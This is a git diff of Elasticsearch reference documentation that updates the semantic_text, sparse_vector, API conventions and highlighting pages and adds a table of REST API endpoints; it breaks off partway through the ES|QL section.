a/docs/reference/elasticsearch/mapping-reference/semantic-text.md b/docs/reference/elasticsearch/mapping-reference/semantic-text.md index 06ea9cc9156e3..d426207ce3873 100644 --- a/docs/reference/elasticsearch/mapping-reference/semantic-text.md +++ b/docs/reference/elasticsearch/mapping-reference/semantic-text.md @@ -2,6 +2,9 @@ navigation_title: "Semantic text" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/semantic-text.html +applies_to: + stack: ga 9.0 + serverless: ga --- # Semantic text field type [semantic-text] @@ -29,9 +32,10 @@ service. Using `semantic_text`, you won’t need to specify how to generate embeddings for your data, or how to index it. The {{infer}} endpoint automatically determines the embedding generation, indexing, and query to use. -Newly created indices with `semantic_text` fields using dense embeddings will be + +{applies_to}`stack: ga 9.1` Newly created indices with `semantic_text` fields using dense embeddings will be [quantized](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-quantization) -to `bbq_hnsw` automatically. +to `bbq_hnsw` automatically as long as they have a minimum of 64 dimensions. If you use the preconfigured `.elser-2-elasticsearch` endpoint, you can set up `semantic_text` with the following API request: @@ -111,13 +115,13 @@ the [Create {{infer}} API](https://www.elastic.co/docs/api/doc/elasticsearch/ope to create the endpoint. If not specified, the {{infer}} endpoint defined by `inference_id` will be used at both index and query time. -`index_options` +`index_options` {applies_to}`stack: ga 9.1` : (Optional, object) Specifies the index options to override default values for the field. Currently, `dense_vector` index options are supported. For text embeddings, `index_options` may match any allowed [dense_vector index options](/reference/elasticsearch/mapping-reference/dense-vector.md#dense-vector-index-options). -`chunking_settings` +`chunking_settings` {applies_to}`stack: ga 9.1` : (Optional, object) Settings for chunking text into smaller passages. If specified, these will override the chunking settings set in the {{infer-cap}} endpoint associated with `inference_id`. @@ -127,8 +131,8 @@ To completely disable chunking, use the `none` chunking strategy. **Valid values for `chunking_settings`**: - `type` - : Indicates the type of chunking strategy to use. Valid values are `none`, `word` or + `strategy` + : Indicates the strategy of chunking strategy to use. Valid values are `none`, `word` or `sentence`. Required. `max_chunk_size` @@ -144,7 +148,8 @@ To completely disable chunking, use the `none` chunking strategy. or `1`. Required for `sentence` type chunking settings ::::{warning} -When using the `none` chunking strategy, if the input exceeds the maximum token limit of the underlying model, some +When using the `none` chunking strategy, if the input exceeds the maximum token +limit of the underlying model, some services (such as OpenAI) may return an error. In contrast, the `elastic` and `elasticsearch` services will automatically truncate the input to fit within the @@ -181,6 +186,15 @@ For more details on chunking and how to configure chunking settings, see [Configuring chunking](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-inference) in the Inference API documentation. +Refer +to [this tutorial](docs-content://solutions/search/semantic-search/semantic-search-semantic-text.md) +to learn more about semantic search using `semantic_text`. + +### Pre-chunking [pre-chunking] +```{applies_to} +stack: ga 9.1 +``` + You can pre-chunk the input by sending it to Elasticsearch as an array of strings. Example: @@ -227,11 +241,7 @@ PUT test-index/_doc/1 * Others (such as `elastic` and `elasticsearch`) will automatically truncate the input. -Refer -to [this tutorial](docs-content://solutions/search/semantic-search/semantic-search-semantic-text.md) -to learn more about semantic search using `semantic_text`. - -## Extracting Relevant Fragments from Semantic Text [semantic-text-highlighting] +## Extracting relevant fragments from semantic text [semantic-text-highlighting] You can extract the most relevant fragments from a semantic text field by using the [highlight parameter](/reference/elasticsearch/rest-apis/highlighting.md) in @@ -257,9 +267,30 @@ POST test-index/_search ``` 1. Specifies the maximum number of fragments to return. -2. Sorts highlighted fragments by score when set to `score`. By default, +2. Sorts the most relevant highlighted fragments by score when set to `score`. By default, fragments will be output in the order they appear in the field (order: none). +To use the `semantic` highlighter to view chunks in the order which they were indexed with no scoring, +use the `match_all` query to retrieve them in the order they appear in the document: + +```console +POST test-index/_search +{ + "query": { + "match_all": {} + }, + "highlight": { + "fields": { + "my_semantic_field": { + "number_of_fragments": 5 <1> + } + } + } +} +``` + +1. This will return the first 5 chunks, set this number higher to retrieve more chunks. + Highlighting is supported on fields other than semantic_text. However, if you want to restrict highlighting to the semantic highlighter and return no fragments when the field is not of type semantic_text, you can explicitly @@ -294,9 +325,14 @@ specified. It enables you to quickstart your semantic search by providing automatic {{infer}} and a dedicated query so you don’t need to provide further details. +### Customizing using `semantic_text` parameters [custom-by-parameters] +```{applies_to} +stack: ga 9.1 +``` + If you want to override those defaults and customize the embeddings that -`semantic_text` indexes, you can do so by modifying <>: +`semantic_text` indexes, you can do so by +modifying [parameters](#semantic-text-params): - Use `index_options` to specify alternate index options such as specific `dense_vector` quantization methods @@ -327,6 +363,24 @@ PUT my-index-000004 } ``` +### Customizing using ingest pipelines [custom-by-pipelines] +```{applies_to} +stack: ga 9.0 +``` + +In case you want to customize data indexing, use the +[`sparse_vector`](/reference/elasticsearch/mapping-reference/sparse-vector.md) +or [`dense_vector`](/reference/elasticsearch/mapping-reference/dense-vector.md) +field types and create an ingest pipeline with an +[{{infer}} processor](/reference/enrich-processor/inference-processor.md) to +generate the embeddings. +[This tutorial](docs-content://solutions/search/semantic-search/semantic-search-inference.md) +walks you through the process. In these cases - when you use `sparse_vector` or +`dense_vector` field types instead of the `semantic_text` field type to +customize indexing - using the +[`semantic_query`](/reference/query-languages/query-dsl/query-dsl-semantic-query.md) +is not supported for querying the field data. + ## Updates to `semantic_text` fields [update-script] For indices containing `semantic_text` fields, updates that use scripts have the @@ -391,6 +445,29 @@ PUT test-index } ``` +## Troubleshooting semantic_text fields [troubleshooting-semantic-text-fields] + +If you want to verify that your embeddings look correct, you can view the +inference data that `semantic_text` typically hides using `fields`. + +```console +POST test-index/_search +{ + "query": { + "match": { + "my_semantic_field": "Which country is Paris in?" + } + }, + "fields": [ + "_inference_fields" + ] +} +``` + +This will return verbose chunked embeddings content that is used to perform +semantic search for `semantic_text` fields. + + ## Limitations [limitations] `semantic_text` field types have the following limitations: @@ -398,6 +475,6 @@ PUT test-index * `semantic_text` fields are not currently supported as elements of [nested fields](/reference/elasticsearch/mapping-reference/nested.md). * `semantic_text` fields can’t currently be set as part - of [Dynamic templates](docs-content://manage-data/data-store/mapping/dynamic-templates.md). + of [dynamic templates](docs-content://manage-data/data-store/mapping/dynamic-templates.md). * `semantic_text` fields are not supported with Cross-Cluster Search (CCS) or Cross-Cluster Replication (CCR). diff --git a/docs/reference/elasticsearch/mapping-reference/sparse-vector.md b/docs/reference/elasticsearch/mapping-reference/sparse-vector.md index 98d2edc097575..79d5f4bbe53c7 100644 --- a/docs/reference/elasticsearch/mapping-reference/sparse-vector.md +++ b/docs/reference/elasticsearch/mapping-reference/sparse-vector.md @@ -26,7 +26,7 @@ PUT my-index ## Token pruning ```{applies_to} -stack: preview 9.1 +stack: ga 9.1 ``` With any new indices created, token pruning will be turned on by default with appropriate defaults. You can control this behaviour using the optional `index_options` parameters for the field: @@ -63,23 +63,23 @@ The following parameters are accepted by `sparse_vector` fields: * Exclude the field from [_source](/reference/elasticsearch/rest-apis/retrieve-selected-fields.md#source-filtering). * Use [synthetic `_source`](/reference/elasticsearch/mapping-reference/mapping-source-field.md#synthetic-source). -index_options {applies_to}`stack: preview 9.1` +index_options {applies_to}`stack: ga 9.1` : (Optional, object) You can set index options for your `sparse_vector` field to determine if you should prune tokens, and the parameter configurations for the token pruning. If pruning options are not set in your [`sparse_vector` query](/reference/query-languages/query-dsl/query-dsl-sparse-vector-query.md), Elasticsearch will use the default options configured for the field, if any. Parameters for `index_options` are: -`prune` {applies_to}`stack: preview 9.1` +`prune` {applies_to}`stack: ga 9.1` : (Optional, boolean) Whether to perform pruning, omitting the non-significant tokens from the query to improve query performance. If `prune` is true but the `pruning_config` is not specified, pruning will occur but default values will be used. Default: true. -`pruning_config` {applies_to}`stack: preview 9.1` +`pruning_config` {applies_to}`stack: ga 9.1` : (Optional, object) Optional pruning configuration. If enabled, this will omit non-significant tokens from the query in order to improve query performance. This is only used if `prune` is set to `true`. If `prune` is set to `true` but `pruning_config` is not specified, default values will be used. If `prune` is set to false but `pruning_config` is specified, an exception will occur. Parameters for `pruning_config` include: - `tokens_freq_ratio_threshold` {applies_to}`stack: preview 9.1` + `tokens_freq_ratio_threshold` {applies_to}`stack: ga 9.1` : (Optional, integer) Tokens whose frequency is more than `tokens_freq_ratio_threshold` times the average frequency of all tokens in the specified field are considered outliers and pruned. This value must between 1 and 100. Default: `5`. - `tokens_weight_threshold` {applies_to}`stack: preview 9.1` + `tokens_weight_threshold` {applies_to}`stack: ga 9.1` : (Optional, float) Tokens whose weight is less than `tokens_weight_threshold` are considered insignificant and pruned. This value must be between 0 and 1. Default: `0.4`. ::::{note} diff --git a/docs/reference/elasticsearch/rest-apis/api-conventions.md b/docs/reference/elasticsearch/rest-apis/api-conventions.md index 574e96e03ac98..bd688868b65f5 100644 --- a/docs/reference/elasticsearch/rest-apis/api-conventions.md +++ b/docs/reference/elasticsearch/rest-apis/api-conventions.md @@ -421,6 +421,39 @@ GET /_nodes/ra*:2 GET /_nodes/ra*:2* ``` +### Component Selectors [api-component-selectors] + +A data stream component is a logical grouping of indices that help organize data inside a data stream. All data streams contain a `data` component by default. The `data` component comprises the data stream's backing indices. When searching, managing, or indexing into a data stream, the `data` component is what you are interacting with by default. + +Some data stream features are exposed as additional components alongside its `data` component. These other components are comprised of separate sets of backing indices. These additional components store supplemental data independent of the data stream's regular backing indices. An example of another component is the `failures` component exposed by the data stream [failure store](docs-content://manage-data/data-store/data-streams/failure-store.md) feature, which captures documents that fail to be ingested in a separate set of backing indices on the data stream. + +Some APIs that accept a ``, ``, or `` request path parameter also support *selector syntax* which defines which component on a data stream the API should operate on. To use a selector, it is appended to the index or data stream name. Selectors can be combined with other index pattern syntax like [date math](#api-date-math-index-names) and wildcards. + +There are currently two selector suffixes supported by {{es}} APIs: + +`::data` +: Refers to a data stream's backing indices containing regular data. Data streams always contain a data component. + +`::failures` +: This component refers to the internal indices used for a data stream's [failure store](docs-content://manage-data/data-store/data-streams/failure-store.md). + +As an example, [search]({{es-apis}}group/endpoint-search), [field capabilities]({{es-apis}}operation/operation-field-caps), and [index stats]({{es-apis}}operation/operation-indices-stats) APIs can all report results from a different component rather than from the default data. + +```console +# Search a data stream normally +GET my-data-stream/_search +# Search a data stream's failure data if present +GET my-data-stream::failures/_search + +# Syntax can be combined with other index pattern syntax (wildcards, multi-target, date math, cross cluster search, etc) +GET logs-*::failures/_search +GET logs-*::data,logs-*::failures/_count +GET remote-cluster:logs-*-*::failures/_search +GET *::data,*::failures,-logs-rdbms-*::failures/_stats +GET ::failures/_search +``` + + ## Parameters [api-conventions-parameters] Rest parameters (when using HTTP, map to HTTP URL parameters) follow the convention of using underscore casing. @@ -583,4 +616,3 @@ If one of these quantities is large we’ll print it out like 10m for 10,000,000 `p` : Peta - diff --git a/docs/reference/elasticsearch/rest-apis/highlighting.md b/docs/reference/elasticsearch/rest-apis/highlighting.md index 93f58eeb6f14e..bbebb8202f506 100644 --- a/docs/reference/elasticsearch/rest-apis/highlighting.md +++ b/docs/reference/elasticsearch/rest-apis/highlighting.md @@ -7,7 +7,7 @@ applies_to: # Highlighting [highlighting] -Highlighters enable you to get highlighted snippets from one or more fields in your search results so you can show users where the query matches are. When you request highlights, the response contains an additional `highlight` element for each search hit that includes the highlighted fields and the highlighted fragments. +Highlighters enable you to retrieve the best-matching highlighted snippets from one or more fields in your search results so you can show users where the query matches are. When you request highlights, the response contains an additional `highlight` element for each search hit that includes the highlighted fields and the highlighted fragments. ::::{note} Highlighters don’t reflect the boolean logic of a query when extracting terms to highlight. Thus, for some complex boolean queries (e.g nested boolean queries, queries using `minimum_should_match` etc.), parts of documents may be highlighted that don’t correspond to query matches. diff --git a/docs/reference/elasticsearch/rest-apis/index.md b/docs/reference/elasticsearch/rest-apis/index.md index e3dd8f9897986..871666cc99209 100644 --- a/docs/reference/elasticsearch/rest-apis/index.md +++ b/docs/reference/elasticsearch/rest-apis/index.md @@ -16,3 +16,667 @@ This section includes: - [Common options](/reference/elasticsearch/rest-apis/common-options.md) - [Compatibility](/reference/elasticsearch/rest-apis/compatibility.md) - [Examples](/reference/elasticsearch/rest-apis/api-examples.md) + +## API endpoints + +### [Autoscaling](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-autoscaling) + +The autoscaling APIs enable you to create and manage autoscaling policies and retrieve information about autoscaling capacity. Autoscaling adjusts resources based on demand. A deployment can use autoscaling to scale resources as needed, ensuring sufficient capacity to meet workload requirements. + +| API | Description | +| --- | ----------- | +| [Get Autoscaling Policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-get-autoscaling-policy) | Retrieves a specific autoscaling policy. | +| [Create or update an autoscaling policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-put-autoscaling-policy) | Creates or updates an autoscaling policy. | +| [Delete Autoscaling Policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-delete-autoscaling-policy) | Deletes an existing autoscaling policy. | +| [Get Autoscaling Capacity](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-get-autoscaling-capacity) | Estimates autoscaling capacity for current cluster state. | + +### [Behavioral analytics](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-analytics) + +```{applies_to} +stack: deprecated +``` + +The behavioral analytics APIs enable you to create and manage analytics collections and retrieve information about analytics collections. Behavioral Analytics is an analytics event collection platform. You can use it to analyze your users' searching and clicking behavior. Leverage this information to improve the relevance of your search results and identify gaps in your content. + +| API | Description | +| --- | ----------- | +| [Get Collections](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-get-behavioral-analytics) | Lists all behavioral analytics collections. | +| [Create Collection](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-put-behavioral-analytics) | Creates a new behavioral analytics collection. | +| [Delete Collection](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-delete-behavioral-analytics) | Deletes a behavioral analytics collection. | +| [Create Event](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-post-behavioral-analytics-event) | Sends a behavioral analytics event to a collection. | + +### [Compact and aligned text (CAT)](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-cat) + +The compact and aligned text (CAT) APIs return human-readable text as a response, instead of a JSON object. The CAT APIs aim are intended only for human consumption using the Kibana console or command line. They are not intended for use by applications. For application consumption, it's recommend to use a corresponding JSON API. + +| API | Description | +| --- | ----------- | +| [Get aliases](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-aliases) | Returns index aliases. | +| [Get allocation](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-allocation) | Provides a snapshot of shard allocation across nodes. | +| [Get component templates](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-component-templates) | Returns information about component templates. | +| [Get count](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-count) | Returns document count for specified indices. | +| [Get fielddata](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-fielddata) | Shows fielddata memory usage by field. | +| [Get health](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-health) | Returns cluster health status. | +| [Get help](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-help) | Shows help for CAT APIs. | +| [Get index information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-indices) | Returns index statistics. | +| [Get master](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-master) | Returns information about the elected master node. | +| [Get ml data frame analytics](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-data-frame-analytics) | Returns data frame analytics jobs. | +| [Get ml datafeeds](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-datafeeds) | Returns information about datafeeds. | +| [Get ml jobs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-jobs) | Returns anomaly detection jobs. | +| [Get ml trained models](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-trained-models) | Returns trained machine learning models. | +| [Get nodeattrs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-nodeattrs) | Returns custom node attributes. | +| [Get node information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-nodes) | Returns cluster node info and statistics. | +| [Get pending tasks](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-pending-tasks) | Returns cluster pending tasks. | +| [Get plugins](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-plugins) | Returns information about installed plugins. | +| [Get recovery](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-recovery) | Returns shard recovery information. | +| [Get repositories](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-repositories) | Returns snapshot repository information. | +| [Get segments](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-segments) | Returns low-level segment information. | +| [Get shard information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-shards) | Returns shard allocation across nodes. | +| [Get snapshots](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-snapshots) | Returns snapshot information. | +| [Get tasks](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-tasks) | Returns information about running tasks. | +| [Get templates](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-templates) | Returns index template information. | +| [Get thread pool](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-thread-pool) | Returns thread pool statistics. | +| [Get transforms](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-transforms) | Returns transform information. | + +### [Cluster](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-cluster) + +The cluster APIs enable you to retrieve information about your infrastructure on cluster, node, or shard level. You can manage cluster settings and voting configuration exceptions, collect node statistics and retrieve node information. + +| API | Description | +| --- | ----------- | +| [Get cluster health](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-health) | Returns health status of the cluster. | +| [Get cluster info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-info) | Returns basic information about the cluster. | +| [Reroute cluster](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-reroute) | Manually reassigns shard allocations. | +| [Get cluster state](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-state) | Retrieves the current cluster state. | +| [Explain shard allocation](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-allocation-explain) | Get explanations for shard allocations in the cluster. | +| [Update cluster settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-settings) | Updates persistent or transient cluster settings. | +| [Get cluster stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-stats) | Returns cluster-wide statistics, including node, index, and shard metrics. | +| [Get cluster pending tasks](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-pending-tasks) | Lists cluster-level tasks that are pending execution. | +| [Get cluster settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-get-settings) | Retrieves the current cluster-wide settings, including persistent and transient settings. | +| [Get cluster remote info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-remote-info) | Returns information about configured remote clusters for cross-cluster search and replication. | +| [Update cluster voting config exclusions](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-post-voting-config-exclusions) | Update the cluster voting config exclusions by node IDs or node names. | +| [Delete voting config exclusions](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-delete-voting-config-exclusions) | Clears voting configuration exclusions, allowing previously excluded nodes to participate in master elections. | + +### [Cluster - Health](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-health_report) + +The cluster - health API provides you a report with the health status of an Elasticsearch cluster. + +| API | Description | +| --- | ----------- | +| [Get cluster health report](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-health-report) | Returns health status of the cluster, including index-level details. | + +### [Connector](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-connector) + +The connector and sync jobs APIs provide a convenient way to create and manage Elastic connectors and sync jobs in an internal index. + +| API | Description | +| --- | ----------- | +| [Get connector](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-get) | Retrieves a connector configuration. | +| [Put connector](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-put) | Creates or updates a connector configuration. | +| [Delete connector](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-delete) | Deletes a connector configuration. | +| [Start connector sync job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-post) | Starts a sync job for a connector. | +| [Get connector sync job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-get) | Retrieves sync job details for a connector. | +| [Get all connectors](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-list) | Retrieves a list of all connector configurations. | +| [Get all connector sync jobs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-list) | Retrieves a list of all connector sync jobs. | +| [Delete connector sync job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-delete) | Deletes a connector sync job. | + +The connector and sync jobs APIs provide a convenient way to create and manage Elastic connectors and sync jobs in an internal index. + +| API | Description | +| --- | ----------- | +| [Get connector](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-get) | Retrieves a connector configuration. | +| [Put connector](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-put) | Creates or updates a connector configuration. | +| [Delete connector](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-delete) | Deletes a connector configuration. | +| [Start connector sync job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-post) | Starts a sync job for a connector. | +| [Get connector sync job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-get) | Retrieves sync job details for a connector. | + +### [Cross-cluster replication (CCR)](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-ccr) + +The cross-cluster replication (CCR) APIs enable you to run cross-cluster replication operations, such as creating and managing follower indices or auto-follow patterns. With CCR, you can replicate indices across clusters to continue handling search requests in the event of a datacenter outage, prevent search volume from impacting indexing throughput, and reduce search latency by processing search requests in geo-proximity to the user. + +| API | Description | +| --- | ----------- | +| [Create or update auto-follow pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-put-auto-follow-pattern) | Creates or updates an auto-follow pattern. | +| [Delete auto-follow pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-delete-auto-follow-pattern) | Deletes an auto-follow pattern. | +| [Get auto-follow pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-get-auto-follow-pattern) | Retrieves auto-follow pattern configuration. | +| [Pause auto-follow pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-pause-auto-follow-pattern) | Pauses an auto-follow pattern. | +| [Resume auto-follow pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-resume-auto-follow-pattern) | Resumes a paused auto-follow pattern. | +| [Forget follower](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-forget-follower) | Removes follower retention leases from leader index. | +| [Create follower](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow) | Creates a follower index. | +| [Get follower](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow-info) | Retrieves information about follower indices. | +| [Get follower stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow-stats) | Retrieves stats about follower indices. | +| [Pause follower](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-pause-follow) | Pauses replication of a follower index. | +| [Resume follower](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-resume-follow) | Resumes replication of a paused follower index. | +| [Unfollow index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-unfollow) | Converts a follower index into a regular index. | +| [Get CCR stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-stats) | Retrieves overall CCR statistics for the cluster. | + +### [Data stream](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-data-stream) + +The data stream APIs enable you to create and manage data streams and data stream lifecycles. A data stream lets you store append-only time series data across multiple indices while giving you a single named resource for requests. Data streams are well-suited for logs, events, metrics, and other continuously generated data. + +| API | Description | +| --- | ----------- | +| [Create data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-create-data-stream) | Creates a new data stream. | +| [Delete data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-data-stream) | Deletes an existing data stream. | +| [Get data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-stream) | Retrieves one or more data streams. | +| [Modify data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-modify-data-stream) | Updates the backing index configuration for a data stream. | +| [Promote data stream write index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-promote-data-stream) | Promotes a backing index to be the write index. | +| [Data streams stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-data-streams-stats) | Returns statistics about data streams. | +| [Migrate to data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-migrate-to-data-stream) | Migrates an index or indices to a data stream. | + +### [Document](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-document) + +The document APIs enable you to create and manage documents in an {{es}} index. + +| API | Description | +| --- | ----------- | +| [Index document](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-create) | Indexes a document into a specific index. | +| [Get document](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get) | Retrieves a document by ID. | +| [Delete document](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete) | Deletes a document by ID. | +| [Update document](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update) | Updates a document using a script or partial doc. | +| [Bulk](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-bulk) | Performs multiple indexing or delete operations in a single API call. | +| [Multi-get document](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-mget) | Retrieves multiple documents by ID in one request. | +| [Update documents by query](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query) | Updates documents that match a query. | +| [Delete documents by query](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete-by-query) | Deletes documents that match a query. | +| [Get term vectors](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-termvectors) | Retrieves term vectors for a document. | +| [Multi-termvectors](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-mtermvectors) | Retrieves term vectors for multiple documents. | +| [Reindex](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-reindex) | Copies documents from one index to another. | +| [Reindex Rethrottle](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-reindex-rethrottle) | Changes the throttle for a running reindex task. | +| [Explain](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-explain) | Explains how a document matches (or doesn't match) a query. | +| [Get source](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-source) | Retrieves the source of a document by ID. | +| [Exists](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-exists) | Checks if a document exists by ID. | + +### [Enrich](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-enrich) + +The enrich APIs enable you to manage enrich policies. An enrich policy is a set of configuration options used to add the right enrich data to the right incoming documents. + +| API | Description | +| --- | ----------- | +| [Create or update enrich policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-put-policy) | Creates or updates an enrich policy. | +| [Get enrich policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-get-policy) | Retrieves enrich policy definitions. | +| [Delete enrich policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-delete-policy) | Deletes an enrich policy. | +| [Execute enrich policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-execute-policy) | Executes an enrich policy to create an enrich index. | +| [Get enrich stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-stats) | Returns enrich coordinator and policy execution statistics. | + +### [EQL](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-eql) + +The EQL APIs enable you to run EQL-related operations. Event Query Language (EQL) is a query language for event-based time series data, such as logs, metrics, and traces. + +| API | Description | +| --- | ----------- | +| [Submit EQL search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-search) | Runs an EQL search. | +| [Get EQL search status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-get) | Retrieves the status of an asynchronous EQL search. | +| [Get EQL search results](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-get) | Retrieves results of an asynchronous EQL search. | +| [Delete EQL search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-delete) | Cancels an asynchronous EQL search. | + +### [ES|QL](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-esql) + +The ES|QL APIs enable you to run ES|QL-related operations. The Elasticsearch Query Language (ES|QL) provides a powerful way to filter, transform, and analyze data stored in Elasticsearch, and in the future in other runtimes. + +| API | Description | +| --- | ----------- | +| [ES|QL Query](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-query) | Executes an ES|QL query using a SQL-like syntax. | +| [ES|QL Async Submit](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query) | Submits an ES|QL query to run asynchronously. | +| [ES|QL Async Get](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-get) | Retrieves results of an asynchronous ES|QL query. | +| [ES|QL Async Delete](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-delete) | Cancels an asynchronous 